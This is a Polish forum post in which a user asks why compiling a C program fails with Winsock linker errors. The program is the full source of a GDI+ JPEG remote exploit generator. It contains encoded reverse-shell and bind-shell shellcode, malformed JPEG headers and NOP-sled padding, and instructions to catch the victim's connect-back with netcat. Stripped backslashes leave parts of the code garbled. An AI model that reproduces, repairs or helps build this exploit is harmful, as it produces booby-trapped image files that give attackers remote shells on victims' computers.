Problem :
Takie bledy mam podczas kompilacji. Moze ktos pomoze?
Kompiluje to:
[Linker error] undefined reference to `WSAStartup@8'[/b]
[Linker error] undefined reference to `htonl@4'[/b]
[Linker error] undefined reference to `WSACleanup@0'[/b]
Takie bledy mam podczas kompilacji. Moze ktos pomoze?
Kompiluje to:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
/* Exploit Data... */
char reverse_shellcode[] =
"xD9xE1xD9x34"
"x24x58x58x58x58x80xE8xE7x31xC9x66x81xE9xACxFEx80"
"x30x92x40xE2xFAx7AxA2x92x92x92xD1xDFxD6x92x75xEB"
"x54xEBx7Ex6Bx38xF2x4Bx9Bx67x3Fx59x7Fx6ExA9x1CxDC"
"x9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6Cx21x84xC5xC1"
"xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6x1Bx77x1BxCF"
"x92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2x8Ex3Fx19xCA"
"x9Ax79x9Ex1FxC5xB6xC3xC0x6Dx42x1Bx51xCBx79x82xF8"
"x9AxCCx93x7CxF8x9AxCBx19xEFx92x12x6Bx96xE6x76xC3"
"xC1x6DxA6x1Dx7Ax1Ax92x92x92xCBx1Bx96x1Cx70x79xA3"
"x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92x6DxC7x8AxC5"
"xC5xC5xC5xD5xC5xD5xC5x6DxC7x86x1Bx51xA3x6DxFAxDF"
"xDFxDFxDFxFAx90x92xB0x83x1Bx73xF8x82xC3xC1x6DxC7"
"x82x17x52xE7xDBx1FxAExB6xA3x52xF8x87xCBx61x39x54"
"xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxCExB6xDAx1B"
"xCExB6xDEx1BxCExB6xC2x1FxD6xB6x82xC6xC2xC3xC3xC3"
"xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xBAx1Bx73x79x9C"
"xFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xB6xC5x6DxC7x9Ex6DxC7"
"xB2xC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97xEA"
"x93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6x19"
"x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9Fx93"
"x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4x19"
"x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3x52"
"x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";
char bind_shellcode[] =
"xD9xE1xD9x34x24x58x58x58"
"x58x80xE8xE7x31xC9x66x81xE9x97xFEx80x30x92x40xE2"
"xFAx7AxAAx92x92x92xD1xDFxD6x92x75xEBx54xEBx77xDB"
"x14xDBx36x3FxBCx7Bx36x88xE2x55x4Bx9Bx67x3Fx59x7F"
"x6ExA9x1CxDCx9Cx7ExECx4Ax70xE1x3Fx4Bx97x5CxE0x6C"
"x21x84xC5xC1xA0xCDxA1xA0xBCxD6xDExDEx92x93xC9xC6"
"x1Bx77x1BxCFx92xF8xA2xCBxF6x19x93x19xD2x9Ex19xE2"
"x8Ex3Fx19xCAx9Ax79x9Ex1FxC5xBExC3xC0x6Dx42x1Bx51"
"xCBx79x82xF8x9AxCCx93x7CxF8x98xCBx19xEFx92x12x6B"
"x94xE6x76xC3xC1x6DxA6x1Dx7Ax07x92x92x92xCBx1Bx96"
"x1Cx70x79xA3x6DxF4x13x7Ex02x93xC6xFAx93x93x92x92"
"x6DxC7xB2xC5xC5xC5xC5xD5xC5xD5xC5x6DxC7x8Ex1Bx51"
"xA3x6DxC5xC5xFAx90x92x83xCEx1Bx74xF8x82xC4xC1x6D"
"xC7x8AxC5xC1x6DxC7x86xC5xC4xC1x6DxC7x82x1Bx50xF4"
"x13x7ExC6x92x1FxAExB6xA3x52xF8x87xCBx61x39x1Bx45"
"x54xD6xB6x82xD6xF4x55xD6xB6xAEx93x93x1BxEExB6xDA"
"x1BxEExB6xDEx1BxEExB6xC2x1FxD6xB6x82xC6xC2xC3xC3"
"xC3xD3xC3xDBxC3xC3x6DxE7x92xC3x6DxC7xA2x1Bx73x79"
"x9CxFAx6Dx6Dx6Dx6Dx6DxA3x6DxC7xBExC5x6DxC7x9Ex6D"
"xC7xBAxC1xC7xC4xC5x19xFExB6x8Ax19xD7xAEx19xC6x97"
"xEAx93x78x19xD8x8Ax19xC8xB2x93x79x71xA0xDBx19xA6"
"x19x93x7CxA3x6Dx6ExA3x52x3ExAAx72xE6x95x53x5Dx9F"
"x93x55x79x60xA9xEExB6x86xE7x73x19xC8xB6x93x79xF4"
"x19x9ExD9x19xC8x8Ex93x79x19x96x19x93x7Ax79x90xA3"
"x52x1Bx78xCDxCCxCFxC9x50x9Ax92x65x6Dx44x58x4Fx52";
char header1[] =
"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x02x00x00x64"
"x00x64x00x00xFFxECx00x11x44x75x63x6Bx79x00x01x00"
"x04x00x00x00x0Ax00x00xFFxEEx00x0Ex41x64x6Fx62x65"
"x00x64xC0x00x00x00x01xFFxFEx00x01x00x14x10x10x19"
"x12x19x27x17x17x27x32xEBx0Fx26x32xDCxB1xE7x70x26"
"x2Ex3Ex35x35x35x35x35x3E";
char setNOPs1[] =
"xE8x00x00x00x00x5Bx8Dx8B"
"x00x05x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
char setNOPs2[] =
"x3ExE8x00x00x00x00x5Bx8Dx8B"
"x2Fx00x00x00x83xC3x12xC6x03x90x43x3BxD9x75xF8";
char header2[] =
"x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x01x15x19x19"
"x20x1Cx20x26x18x18x26x36x26x20x26x36x44x36x2Bx2B"
"x36x44x44x44x42x35x42x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44x44"
"x44x44x44x44x44x44x44x44x44x44x44x44x44xFFxC0x00"
"x11x08x03x59x02x2Bx03x01x22x00x02x11x01x03x11x01"
"xFFxC4x00xA2x00x00x02x03x01x01x00x00x00x00x00x00"
"x00x00x00x00x00x03x04x01x02x05x00x06x01x01x01x01"
"x01x00x00x00x00x00x00x00x00x00x00x00x00x01x00x02"
"x03x10x00x02x01x02x04x05x02x03x06x04x05x02x06x01"
"x05x01x01x02x03x00x11x21x31x12x04x41x51x22x13x05"
"x61x32x71x81x42x91xA1xC1x52x23x14xB1xD1x62x15xF0"
"xE1x72x33x06x82x24xF1x92x43x53x34x16xA2xD2x63x83"
"x44x54x25x11x00x02x01x03x02x04x03x08x03x00x02x03"
"x01x00x00x00x00x01x11x21x31x02x41x12xF0x51x61x71"
"x81x91xA1xB1xD1xE1xF1x22x32x42x52xC1x62x13x72x92"
"xD2x03x23x82xFFxDAx00x0Cx03x01x00x02x11x03x11x00"
"x3Fx00x0Fx90xFFx00xBCxDAxB3x36x12xC3xD4xADxC6xDC"
"x45x2FxB2x97xB8x9DxCBx63xFDx26xD4xC6xD7x70xA4x19"
"x24x50xCAx46x2BxFCxEBx3BxC7xC9xA5x4Ax8Fx69x26xDF"
"x6Dx72x4Ax9Ex27x6Bx3ExE6x92x86x24x85x04xDBxEDxA9"
"x64x8Ex6Bx63x67x19x1AxA5xE7xB8x28x3Dx09xABx5Dx5F"
"x16xF7x8CxEDx49x4CxF5x01xE6xE5xD5x1Cx49xABx10x71"
"xA6x36x9Bx93x24x61x00x0Fx61xECx34xA7x9Cx23xF4x96"
"xC6xE6xAFxB7x80x76xEFx93xF0xAAx28x8Ax6BxE0x18xC0"
"xA4x9Bx7Ex90x39x03xC2x90xDCx43x31x91x62x91x86x23"
"x35x35xA2x80x4DxFAx72x31x07x9Dx03x70xA8x93x24x4F"
"x89x51x83x5ExA4x2Ex7AxC0x7DxA9x8Ax10x61x64x07xFA"
"x88xC6x89x26xDAx0Fx20xBDxB9x16xD2xA8xE8x91x3Fx1A"
"xE2xBAxF0xBEx74xABx1DxC4x44x15x1Ax8Ax9CxC7x2Ax6B"
"xA3x33xB7x1Ex88x47x69xA9x64x68x26xC1x97x0BxD6x86"
"x8Bx1Bx29xC6x87xE4xC7xFDxCCx53x11xA5x9Cx62x6AxE5"
"x40x37x61x89xF6xB2x9Cx2Ax7CxFDx05x6Ax30x5Fx52x02"
"xEBx72xBFx7Dx74x4Cx23xB9x8FxD8x78x67x54x59x64x47"
"xC5x75x21x18xD5xE3x58xE1x72x63xBFx6DxBDxCBxCAx82"
"x65xE7xDBx09x54x4Fx0Dx95x86x76xE3xF2xA0x48x82x55"
"xD7xA6xCExA7xAAxDCx6AxF1xA9x8ExE0x35xC1xCAxA1xD4"
"x93xD2xD6x39x95x3Cx6Bx46x60xACxC1x3Bx60xC9x70x84"
"x8ExA1x9Ax9Ax20x01x94xCAx08x91x53xDCx01xB1xB5x12"
"x37x11xC6xC1xACxF1x11xD4x9Cx6Bx3Ex69x76xF0x1Dx7B"
"x52x6DxC9xA8x66x94xBBx79x8Fx7ExDEx17xFDx4DxABx1E"
"x76x7AxA3x2BxE2x50x06xB7x2CxEBx2Ax49xC9xEAx4Ex9B"
"xE7xCAxAFx1ExECx23xDCx8BxE1x6Bx5Fx1Ax9BxE8x49x2E"
"x63xE5x03x32xCDx19xB8x23x10x78x1Fx85x5Cx15x8Cx97"
"x84x9BxDBx15x35x9Fx16xE0x1Ex86xB9x8Fx97x11x4ExDA"
"x35x02x45x25x93xF8x55x24x17xB9x1BxF5xC8x07xA9xE2"
"x2Ax76xB0xC2x37x01x95xADx81xB6x1Cx6AxA2x38xD9xAE"
"xCAx59x18x75x25xFFx00x81xAExD8xE8xBBx47x62xACxB7"
"xB6xA1x8Dx40xE3x86x65x6Dx1ExDBx89x2Fx9DxCDx6Bx24"
"x62x41x61x89xACx2Dx8Bx3ExB6x68xC0x63x73x70x6Bx6B"
"x6AxA1x7AxACx56xE7x11x56x58xD4x13xA4x0BxB6xEBxB3"
"x3Bx47x22x95xD3x53x2ExEAx19x86x96xF7x03x83x52x9E"
"x54xABx6Ex58x63x7Cx33xCEx93xB1x19x1CxE9xDBxAAx35"
"xBFx46x8DxD4xD2x56xE0xE0x33xA1x4Dx0Ax4Ex3BxB1xCD"
"xD4x06x44x56x4AxCDx24x26xEAx6Dx7Ax87xDCx3Bx60x6D"
"xFCx2Ax86x1Bx97x36x6Dx42x04xA0x11xEExE7x46x22x35"
"xD5x26xB0x1Cx0Bx7Cx69x5Fx06xECx5AxC5x0Bx46x70x27"
"xF2xD4x79xADx89xDAx30x74xBDx98xE4x68x58x86xE4x1B"
"x69xB9xDCx2Bx30x87x48x53xC5x85x3BxDDx8Ax4ExB5x42"
"xB2x8Cx6Ex2Cx01xF8x56x04x7BxC9xA3x05x4FxB4xD5xA2"
"xDFxF6xFDxC6xE2xA7x3Cx89x24xFExA9x5ExC3xD4x6DxF7"
"x85xC9x59x39x63x59x9BxFFx00x06x1Ax5ExFAx69x0Ax46"
"x2BxC0x9FxC2x91x8BxC9x40x58x16xBDxF2xC0xD3x3Bx7F"
"x2DxA9xBBx2Ex49x42x6Dx52x70x39x62x9Fx08x73x6Fx20"
"x09x64x00x01x83x2Bx00xD5x97xBCxDCxF6x9CxA7x66xEA"
"xD9xB6x9FxE1x56xDExBAxECx65xB4x44xD8xE3x8Dx52x2F"
"x36xCEx74x33x7Ex9Fx2Ex22x99x8BxC9x6Dx5Ax6Dx9ExA8"
"x22xC7x0CxA8x62x3Dx17x1Dx2FxC8xFAxD4xB0x9Ex14x45"
"x45xD5x6Ex96x04xE1xF1xA0x37x90x5BxD8x7Fx81x57x1B"
"xC8xD5x48x27x0Ex3Cx6Bx3DxCDx44x15x92x41x25x94x82"
"xAEx0Ex42x97x8Dx8Cx6DxAEx56xB8x26xD8x0FxE3x43x93"
"x73x18x75x28xD7xF8xD5xFFx00x74xE4x18xC2x82xACx6F"
"x86x7Fx2Ax4CxBExE5xFCxD2x22xCCx9Ax32xD1x7Cx7Dx68";
/* Code... */
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
void print_usage(char *prog_name)
{
printf(" Exploit Usage:n");
printf("t%s -r your_ip | -b [-p port] <jpeg_filename>nn", prog_name);
printf(" Parameters:n");
printf("t-r your_ip or -bt Choose -r for reverse connect attack modentttt
and choose -b for a bind attack. By defaultntttt if you don't specify -r or
-b then a bindntttt attack will be generated.nn");
printf("t-p (optional)tt This option will allow you to change the port ntttt
used for a bind or reverse connect attack.ntttt If the attack mode is bind
then thentttt victim will open the -p port. If the attackntttt mode
is reverse connect then the port yountttt specify will be the one you want
to listenntttt on so the victim can connect to yountttt right away.nn");
printf(" Examples:n");
printf("t%s -r 68.6.47.62 -p 8888 test.jpgn", prog_name);
printf("t%s -b -p 1542 myjpg.jpgn", prog_name);
printf("t%s -b whatever.jpgn", prog_name);
printf("t%s -r 68.6.47.62 exploit.jpgnn", prog_name);
printf(" Remember if you use the -r option to have netcat listeningn");
printf(" on the port you are using for the attack so the victim willn");
printf(" be able to connect to you when exploited...nn");
printf(" Example:n");
printf("tnc.exe -l -p 8888");
exit(-1);
}
int main(int argc, char *argv[])
{
FILE *fout;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 1337; /* default port for bind and reverse attacks */
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char attack_mode = 2; /* bind by default */
char *p1 = polish, *p2 = polish;
char ip_addr[256];
char str_num[16];
char jpeg_filename[256];
WSADATA wsa;
printf(" +------------------------------------------------+n");
printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |n");
printf(" | September, 23, 2004 |n");
printf(" +------------------------------------------------+n");
if (argc < 2)
print_usage(argv[0]);
/* process commandline */
for (i = 0; i < (unsigned) argc; i++) {
if (argv[0] == '-') {
switch (argv[1]) {
case 'r':
/* reverse connect */
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
case 'b':
/* bind */
attack_mode = 2;
break;
case 'p':
/* port */
port = atoi(argv[i+1]);
break;
}
}
}
strncpy(jpeg_filename, argv[i-1], 255);
fout = fopen(argv[i-1], "wb");
if( !fout ) {
printf("Error: JPEG File %s Not Created!n", argv[i-1]);
return(EXIT_FAILURE);
}
/* initialize the socket library */
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!n");
exit(-1);
}
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1) {
/* reverse connect attack */
reverse_shellcode[184] = (char) 0x90;
reverse_shellcode[185] = (char) 0x92;
reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
reverse_shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
reverse_shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[182] = xor_data((char)raw_num);
}
if (attack_mode == 2) {
/* bind attack */
bind_shellcode[204] = (char) 0x90;
bind_shellcode[205] = (char) 0x92;
bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));
bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));
}
/* build the exploit jpeg */
j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
for(i = 0; i < sizeof(header1) - 1; i++)
fputc(header1, fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)
fputc(setNOPs1, fout);
for(i=0;i<sizeof(header2)-1;i++)
fputc(header2, fout);
for( i = j; i < 0x63c; i++)
fputc(0x90, fout);
j = i;
if (attack_mode == 1) {
for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)
fputc(reverse_shellcode, fout);
}
else if (attack_mode == 2) {
for(i = 0; i < sizeof(bind_shellcode) - 1; i++)
fputc(bind_shellcode, fout);
}
for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)
fputc(0x90, fout);
for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)
fputc(setNOPs2[j], fout);
fprintf(fout, "xFFxD9");
WSACleanup();
printf(" Exploit JPEG file %s has been generated!n", jpeg_filename);
return(EXIT_SUCCESS);
}[/b]